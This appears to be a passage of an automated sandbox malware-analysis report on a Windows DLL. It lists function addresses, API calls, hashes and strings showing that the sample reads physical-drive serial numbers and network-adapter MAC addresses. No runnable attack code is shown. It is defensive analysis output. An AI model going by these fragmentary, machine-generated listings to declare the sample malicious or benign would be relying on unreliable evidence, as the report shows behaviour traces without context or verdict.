                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c4e8449e9130b5752f6b1054d4cf30f6e579bb0d9dcf680373ec7c4a23ed90fc
                                                                                                                                                                                                                              • Instruction ID: f3156913ff02ad4a5732b4783eb0232db37112c734d6f713ef4b1ee022e2e4c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4e8449e9130b5752f6b1054d4cf30f6e579bb0d9dcf680373ec7c4a23ed90fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F0EC61F85141CDF304AB31AE97B1D22A42F583C4FE0F234E509C526DEB5CF4819759
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A93630 Relevance: 1.5, APIs: 1, Instructions: 213COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                              • Opcode ID: cd21de74bb0789b695e23fa96412ff779e2eccf7f3696846a487c7cd0b9e28c2
                                                                                                                                                                                                                              • Instruction ID: 3badead5ecf76d72949b5e0afbb88b69ebeb05e2fff48be06470680144dc5ed8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd21de74bb0789b695e23fa96412ff779e2eccf7f3696846a487c7cd0b9e28c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C29199B3B21B9486DB558F26D04535D3BB5E709FD8F18811AEE8A0B79CDB38C885C384
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A31B90 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                              • Opcode ID: 680f1d3e8d6a18711b492788cf6cf3e22378e6d8684222188490c5746993e8e1
                                                                                                                                                                                                                              • Instruction ID: f7962d9d687006c1840d00377e0d0f6fe225e7e9e72944468b61b768e0a7c4d6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 680f1d3e8d6a18711b492788cf6cf3e22378e6d8684222188490c5746993e8e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FEF01732A49B5881EA258F41F44075EE764FB88BA0F884124EECD17B28EB38D5A2C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A70470 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.MSVCRT(?,?,000001C62F986530,0000001B,70A72E8D,000001C62F986530,?,?,70A758B5,?,70A986E0,00000000,70A6FEA8), ref: 70A7047F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                              • Opcode ID: ca1a83635959ac3ddeadb1fa036af3f9acd451c42f00e31693fc18c164fdf8cd
                                                                                                                                                                                                                              • Instruction ID: ae1337fc3cd545b5f194a735b92e95b58d3b068a0261054706a2e0af5155b81f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca1a83635959ac3ddeadb1fa036af3f9acd451c42f00e31693fc18c164fdf8cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CD01266B9BA5581D51D9B533C4069895966B5DBE0E18C1308E4D57715EC2C54934300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A704F0 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                              • Opcode ID: 69908a19ab123864c8fe60f3a20c1d36d75cedccd38541298c3fe29963b1afd5
                                                                                                                                                                                                                              • Instruction ID: d52325a4e57e1f83d68f0290b79a219aa7056fa16ae4378329d0d5fdd26455bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69908a19ab123864c8fe60f3a20c1d36d75cedccd38541298c3fe29963b1afd5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAC08CA6B13A00C1FF094BB2FC513382220AB5CF05F189010CE0A46304CB2C80908711
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 70A220A0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 156memoryfileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 70A220EC
                                                                                                                                                                                                                              • CreateFileA.KERNEL32 ref: 70A22120
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 70A2213A
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 70A221B4
                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 70A221CA
                                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 70A22207
                                                                                                                                                                                                                              • CreateFileA.KERNEL32 ref: 70A22234
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 70A22255
                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 70A22264
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 70A222AC
                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 70A222C5
                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 70A222CA
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 70A222D4
                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 70A222F6
                                                                                                                                                                                                                                • Part of subcall function 70A21D90: GetLastError.KERNEL32 ref: 70A21D94
                                                                                                                                                                                                                                • Part of subcall function 70A21D90: FormatMessageA.KERNEL32 ref: 70A21DC5
                                                                                                                                                                                                                                • Part of subcall function 70A21D90: LocalFree.KERNEL32 ref: 70A21DE6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Global$Free$Alloc$ControlCreateDeviceFile_snprintf$CloseErrorFormatHandleLastLocalMessage
                                                                                                                                                                                                                              • String ID: /%d:$Empty serial number$SCSIDISK$\\.\PhysicalDrive%d$\\.\Scsi%d$platforms/windows/hdinfo.c
                                                                                                                                                                                                                              • API String ID: 1119308327-2400754906
                                                                                                                                                                                                                              • Opcode ID: 5b781da57fd72c9faddcda835d00ea37e60f5d0e569b47450a1bff5311f1bb9f
                                                                                                                                                                                                                              • Instruction ID: 94dc9e18f97eb46cb0506add910d7724cc2baeb39b9972ef1ab95a8c8eb50e79
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b781da57fd72c9faddcda835d00ea37e60f5d0e569b47450a1bff5311f1bb9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05519D31704A818AE7109F22F91475B7BA4F788BE4F544225AE5E0BBE8DF7DC6098744
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A22450 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 171fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandleisxdigitmemset$ControlCreateDeviceFileisprintmemcpywsprintf
                                                                                                                                                                                                                              • String ID: /%d:$\\.\PhysicalDrive%d
                                                                                                                                                                                                                              • API String ID: 2355516209-72258043
                                                                                                                                                                                                                              • Opcode ID: eceda2a150543429a179e055391531e2ad4685b3a5bba6cfb4e2b51c6b49a9ec
                                                                                                                                                                                                                              • Instruction ID: 4dd1a30eb7bdac4b5df0d4eb808cc481c651e11b08b694f7f2f0181bcb78e5d4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eceda2a150543429a179e055391531e2ad4685b3a5bba6cfb4e2b51c6b49a9ec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E051453321868096E711CB26F85435FBBA2FBC5795F548225EE9A87B9CDB7CC108CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A37600 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 110encryptionCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cryptclock$Context$Acquire$RandomRelease
                                                                                                                                                                                                                              • String ID: ($Microsoft Base Cryptographic Provider v1.0$out != NULL$src/prngs/rng_get_bytes.c
                                                                                                                                                                                                                              • API String ID: 2525729555-3762154145
                                                                                                                                                                                                                              • Opcode ID: 4848b7ca004d8edc9007320178bf9370c6c86c3f100b7a5fc8fc007ceda71cad
                                                                                                                                                                                                                              • Instruction ID: 4df1268dd665b30789179f69cff6e889cd6043b0e106b1c8934241abec0e99b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4848b7ca004d8edc9007320178bf9370c6c86c3f100b7a5fc8fc007ceda71cad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C314932718A4482E720CB6AED5434EB6A5B78E7D0F904125DE4B4332CEFBDD946C340
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A21E00 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 98memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %02x:%02x:%02x:%02x:%02x:%02x, xrefs: 70A21E77
                                                                                                                                                                                                                              • Too small size, xrefs: 70A21F40
                                                                                                                                                                                                                              • platforms/windows/hdinfo.c, xrefs: 70A21F47
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$AdaptersAddressesFree$Alloc
                                                                                                                                                                                                                              • String ID: %02x:%02x:%02x:%02x:%02x:%02x$Too small size$platforms/windows/hdinfo.c
                                                                                                                                                                                                                              • API String ID: 3314560173-3552495142
                                                                                                                                                                                                                              • Opcode ID: ee7a09a90da215b55c65f9714d1a4b5b7924476b51ef4ac29daf527e9d0e8101
                                                                                                                                                                                                                              • Instruction ID: aad239612cb9631c6cb414dd02be381d400ac0670fbb09a8f599eff72613a06b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee7a09a90da215b55c65f9714d1a4b5b7924476b51ef4ac29daf527e9d0e8101
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D43105227082818AD710DBBABD1076F77A2FB98B95F44423ABD598375CDB3CD6048B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A21C20 Relevance: 15.1, APIs: 10, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$Free$AdaptersAddressesAllocmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3510192139-0
                                                                                                                                                                                                                              • Opcode ID: af1122cbaebd84a5b7d206a99ea61414a4f2942f269f32d6737d7bc3ae55712f
                                                                                                                                                                                                                              • Instruction ID: 42334ab78bbf091628e71c7f10d5a3b89f994f9332622572f3320ec3e2970cd2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af1122cbaebd84a5b7d206a99ea61414a4f2942f269f32d6737d7bc3ae55712f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F31F5237055818AD741DB6ABD00B5F27A6E799BE5F48813AEE0D87B1CEF38C941C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A94890 Relevance: 12.0, APIs: 8, Instructions: 50COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlCaptureContext.KERNEL32 ref: 70A948A4
                                                                                                                                                                                                                              • RtlLookupFunctionEntry.KERNEL32 ref: 70A948BB
                                                                                                                                                                                                                              • RtlVirtualUnwind.KERNEL32 ref: 70A948FD
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 70A94941
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32 ref: 70A9494E
